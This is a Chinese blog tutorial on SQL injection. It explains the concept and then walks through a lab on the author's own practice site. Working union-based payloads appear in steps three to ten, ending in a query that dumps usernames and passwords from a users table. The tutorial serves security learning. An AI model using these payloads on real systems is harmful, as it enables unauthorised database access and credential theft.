初识SQL注入

最新推荐文章于 2024-05-22 08:39:03 发布
最新推荐文章于 2024-05-22 08:39:03 发布
阅读量806 收藏 15
点赞数 4
分类专栏: 渗透测试 漏洞验证 文章标签: SQL注入
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_38603541/article/details/98046913
版权

初识SQL注入,究竟什么是SQL注入?其实所谓SQL注入,就是通过把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。具体来说,它是利用现有应用程序,将(恶意的)SQL命令注入到后台数据库引擎执行的能力,它可以通过在Web表单中输入(恶意)SQL语句得到一个存在安全漏洞的网站上的数据库,而不是按照设计者意图去执行SQL语句。

SQL注入原理

SQL注入攻击指的是通过构建特殊输入作为参数传入Web应用程序,而这些输入大都是SQL语句里的一些组合,通过执行SQL语句而执行攻击者所要的操作,其主要原因是程序没有细致的过滤用户输入的数据,致使非法数据侵入系统。

SQL注入的来源

1、程序员水平和经验的欠缺,对SQL注入不够重视或者没有防范意识;

2、现在很多教程或者模板存在SQL注入漏洞;

3、Internet上给出的许多解决办法并未解决;

4、数据库管理员对数据库权限设置不合理。

SQL注入的主要特点

1、变种极多

2、攻击简单

3、危害极大

SQL注入典型攻击手段

· 判断应用程序是否存在注入漏洞

· 收集信息并判断数据库类型

· 根据注入参数类型,重构SQL语句跟原貌

· 猜解表名、字段名

· 获取账户信息、攻击Web或为下一步攻击做准备。

MySQL——字符串连接函数

· concat(str1,str2……)函数,直接连接

· group_concat(str1,str2……)函数,使用逗号作为分隔符

· concat_ws(sep,str1,str2……)函数,使用第一个参数做分隔符

 

说了这么多,接下来我们通过一个实验来看看SQL注入到底是怎么进行的,如何进行SQL注入

 

实验环境:本人自行搭建的SQL联系平台进行试验测试。

实验过程:

第一步:首先要判断注入点和注入类型。在打开的网页的链接中,添加后缀“ and 1=1”,回车执行,网页没有发生任何变化。

第二步,将第一步的后缀链接改成“ and 1=2”,回车执行,发现网页还是没有任何变化。此时,综合第一步和第二步我们可知,该SQL的注入类型并不是整型注入,原因是,我们在执行了 “and 1=1”和“and 1=2”之后,网页都没有变化,说明and之后的内容并没有被执行,and之前的内容恒为真。既然不是整型注入,那么接下来我们进行字符型注入的验证。

第三步,添加后缀“’ and 1=1 %23”,回车执行。这里解释一下为什么这样写,因为表单在传参数时应该是[‘$id’]形式,先输入的右单引号与参数传入位置的左单引号形成闭合区间,最后面的%23又是什么意思呢?其实,我们将参数传递过去,给了一个右单引号已经和前面的左单引号形成了闭合,而且这队单引号之间是空值,这样已经形成了配对,最后留下的一个多余的单引号我们需要给注释掉,这里的#(也就是%23)就是注释的意思。

第四步,添加后缀“' and 1=2 %23”回车执行,此时我们发现,网页报错了,这就说明了一点就是该SQL注入的类型为字符型。

第五步,添加后缀“’ order by 4 %23”和“’ order by 3 %23”进行测试,看一下该数据库内有几列。当我们添加后缀“’ order by 4 %23”执行的时候,网页报错,说第四列不存在,那我们再用“’ order by 3 %23”测试,该测试没问题,说明该数据库有3列。

第六步,添加后缀“' union select 1,2,3 %23”,回车执行,也没反映?此时呢我们需要改一下前面id的值,让其等于 -1 执行。

第七步,既然我们已经知道该数据库的大体情况了,我们可以查询所有库名,命令:

“’ and 1=2 union select 1,2,group_concat(schema_name) from information_schema.schemata %23”

查看当前库:“’ and 1=2 union select 1,2,concat(database())%23”

查看库的版本:“’ and 1=2 union select 1,2,concat(version())%23”

第八步,查询可疑库security中所有的表。

命令:“' and 1=2 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema="security"%23”

第九步,在该库中我们可以看到有一个users表,经验表明该表存放的是用户信息,所以我们查看该表的所有字段。

命令:“' and 1=2 union select 1,2,group_concat(column_name) from information_schema.columns where table_schema="security" and table_name="users"%23”

第十步,查看表中数据。通过上一步我们可以看到,在users表中包含字段id,username,password,这三个字段。这其实就是我们SQL要找的数据所存放的位置了,下面,我们就将根据字段来获取数据库里面的数据。

命令:“' and 1=2 union select 1,2,group_concat(id,0x23,username,0x23,password) from security.users %23”

SQL注入获取数据成功,实验完成。

声明:本实验所使用环境为本人自行搭建实验环境进行操作,未经允许,不得访问文中所提供的IP,否则,后果自负!!!

需要搭建本实验平台请联系博主+Q:2392900426

烟雨天青色
关注
  • 4
    点赞
  • 15
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
网络安全之SQL 注入实战
m0_74131821的博客
05-10 1093
今天通过实战,给大家演示一下SQL注入攻击!
SQL 注入知识准备
东方
07-21 137
参考 http://blkstone.github.io/2017/11/09/updatexml-sqli/ https://www.smi1e.top/sql注入笔记/#i(smile笔记等于上个985) MySQL报错型SQL注入 updatexml()、extractvalue() 关于 updatexml 函数 UPDATEXML (XML_document, XPath_string,...
模糊查询-防止sql注入
xiaoguaihu12的博客
09-06 1934
在mapper中写 模糊查询,按名称查询时,直接在sql语句中写%x%,等于写死在里面了,以后 每次查询都需要改动,那怎么办呢? 1.加入concat()关键字:concat('%',#{name},'%') 不常用,比较麻烦。动态参数 底层调用parperedStatement 可防止sql注入 2.'%' #{name} '%' 常用 中间有空格注意。动态参数 底层调用parpere...
sql注入常用函数
weixin_41489908的博客
11-18 3144
​当所有情绪都堆在一起的时候,才发现自己已经不是那个一块糖就能开心的小孩子了。。。 ---- 网易云热评 一、MySql注入常用函数 1、system_user()系统用户名 2、user()用户名 3、current_user()当前用户名 4、session_user()链接数据库的用户名 5、database()数据库名 6、version()数据库版本 7、@@datadir数据库路径 8、@@basedir数据库安装路径 9、@@version_conpile_os操作系统.
什么是SQL注入SQL注入详解(非常详细)零基础入门到精通,收藏这一篇就够了
最新发布
weixin_45840241的博客
05-22 6440
注意,在上面这个mapper文件中,只有一个select语句,而这个语句传参使用了符号$,它会把参数值直接进行替换,而不会进行预编译(如果使用占位符#,就会进行预编译,从而可以防止SQL注入)。(2) 加 ’and 1=1 此时sql 语句为:select * from table where name=’admin’ and 1=1’ ,也无法进行注入,还需要通过注释符号将其绕过;这显然是不对的,接口把查询范围之外的数据都搜索出来了,如果还有一些修改数据或者操纵数据库的一些命令,那就更危险了。
SQL注入中,注释#、 --+、 --%20、 %23到底是什么意思?sqli-labs-master
热门推荐
weixin_43096078的博客
08-25 2万+
1.# 和 -- (有个空格)表示注释,可以使它们后面的语句不被执行。在url中,如果是get请求**(记住是get请求,也就是我们在浏览器中输入的url)** ,解释执行的时候,url中#号是用来指导浏览器动作的,对服务器端无用。所以,HTTP请求中不包括#,因此使用#闭合无法注释,会报错;而使用-- (有个空格),在传输过程中空格会被忽略,同样导致无法注释,所以在get请求传参注入时才会使用--+的方式来闭合,因为+会被解释成空格。 2.当然,也可以使用--%20,把空格转换为urlencode编码格式
Sql注入
aetlypdlg_ys的博客
01-24 1475
联合注入 判断注入点 GET['id'] ?id=n eg:127.0.0.1/sqli-labs/Less-1/?id=1 %23(#):过滤后面的语句 eg:127.0.0.1/sqli-labs/Less-1/?id=1' %23 加 ' 报错,再加%23(#)不报错,可判断一个注入点 整型注入:注入的是1,2,3...... 字符型注入:注入的是a,b,c,def...... 判断显示位(列) order by n n>列数 -->报错 n<=列数 --&
SQL注入SQL注入基本流程
scarlett0523的博客
08-28 1453
SQL注入SQL注入基本流程 摘要 一次简单的SQL注入靶场实践,两个实验环境,分别为有显示位和没有显示位,采用联合注入和布尔型注入的方法,分别通过手注和sqlmap工具的方式进行注入,最终获得数据库数据。 【场景一】 关键字: 联合注入,手注 背景: 只有登录页面,需账号密码登录 工具: MD5在线解密工具 步骤: 1.查看当前页面,发现登录框下方有滚动条,内有公告信息,尝试点击 2...
千里之堤,溃于蚁穴——揭密SQL注入攻击——初识SQL注入
06-26
初识SQL注入,揭密SQL注入攻击,有兴趣的可以当作入门参考!
22-09-29-03_SqlSugarAcquaintance(初识SqlSuga之ConfigureOptions注入实现)
09-29
3章 初识SqlSugarCore之ConfigureOptions注入实现 在示例“22-09-28-02_SqlSugarAcquaintance(初识SqlSugarCore之最简注入)”中,数据库连接字符串被直接定义到“上下文”类的构造方法中,但这种实现方式只能用于...
初识mybatis的项目
03-03
6. **参数映射**:使用 `@Param` 注解或命名参数(如 `${paramName}`)可以方便地进行参数映射,避免了手动设置 SQL 参数带来的安全问题,如 SQL 注入。 7. **缓存机制**:MyBatis 内置了本地缓存和二级缓存,可以...
初识SQLMAP API和命令行中调用1
08-03
“本文前言:最近在写一款漏洞检测软件的时候,发现对于SQL注入的一些判断还有测试不是很精准,于是乎我就想到了本文的一个主角,SQLMAPAPI,这个API是SQ
初识MyBatis
05-06
- **#{}**:预编译参数,适用于JDBC的PreparedStatement,防止SQL注入。 - **${}**:字符串替换,不进行预编译,主要用于动态SQL的构建。 7. **结果映射** 结果映射是MyBatis将查询结果自动映射到Java对象的过程...
Sql注入详解(原理篇)
Naive的博客
09-11 9569
SQL 注入漏洞非常复杂,区分各种数据库类型,提交方法,数据类型等注入,同样此类漏洞是WEB安全中严重的安全漏洞,学习如何利用,挖掘,修复也是很重要的。SQL 注入就是指 Web 应用程序对用户输入的数据合法性没有过滤或者是判断,攻击者可以在Web应用程序中事先定义好的查询语句的结尾上添加额外的SQL语句,在管理员不知情的情况下实现非法操作,以此来实现欺骗数据库服务器执行非授权的任意查询,从而进一步得到相应的数据信息。
SQL注入
m0_51600840的博客
07-25 2700
是注释的意思,那么是不是后面的都被注释掉了,所以该语句的意思是不是就变成了如果USER等于我输入的值或者1=1那么就登录成功,因为1=1恒成立,那么是不是不管我输入什么都能登录成功,甚至不需要输入密码。盲注入盲注不会展现任何数据库报错内容,它是依据构造真或假的问题对数据库进行“提问”,注入方式主要有两种基于布尔值与基于时间。网站被挂马,传播恶意软件修改数据库一些字段的值,嵌入网马链接,进行挂马攻击。换言之,我服务器明明想要执行的是你用户提交的一个数据,可是你提交了一个数据。...
sql注入的原理详解
牛不牛先生
01-11 8588
sql注入原理详解(一) 我们围绕以下几个方面来看这个问题: 1.什么是sql注入? 2.为什么要sql注入? 3.怎样sql注入? 1.什么是sql注入?   所谓SQL注入,就是通过把SQL命令插入到Web表单递交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令,比如先前的很多影视网站泄露VIP会员密码大多就是通过WEB表单递交查询字符暴出的,这类表单特别容易受到SQL...
SQL注入漏洞-SQL注入原理与实践
HacHunter的博客
03-03 1239
什么是SQL注入?:所谓SQL注入,就是通过把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。具体来说,它是利用现有应用程序,将(恶意的)SQL命令注入到后台数据库引擎执行的能力,它可以通过在Web表单中输入(恶意)SQL语句得到一个存在安全漏洞的网站上的数据库,而不是按照设计者意图去执行SQL语句。 MySQL基础语法:MySQL 教程_w3cschool 浏览器打开sqli.com/sqli-1.php,其源码如下...
Sql注入基础原理介绍(超详细)
weixin_30325487的博客
09-06 4305
一、Sql注入简介 Sql 注入攻击是通过将恶意的 Sql 查询或添加语句插入到应用的输入参数中,再在后台 Sql 服务器上解析执行进行的攻击,它目前黑客对数据库进行攻击的最常用手段之一。 二、Web 程序三层架构 三层架构(3-tier architecture) 通常意义上就是将整个业务应用划分为: 界面层(User Interface layer) 业务逻辑层(Business Logic...
SQL注入原理简解
weixin_49182737的博客
05-11 3796
SQL注入原理简单介绍
信安之路2017:安全学习与经验分享
"SQL注入学习总结"和"SQL注入的常规思路及奇葩技巧"分析了SQL注入的原理和应对方法,"XSS学习笔记"分为两部分,详述了XSS攻击的类型和防御手段。"Session机制及CSRF攻防"则关注了会话管理及跨站请求伪造的防范。 ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

烟雨天青色

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值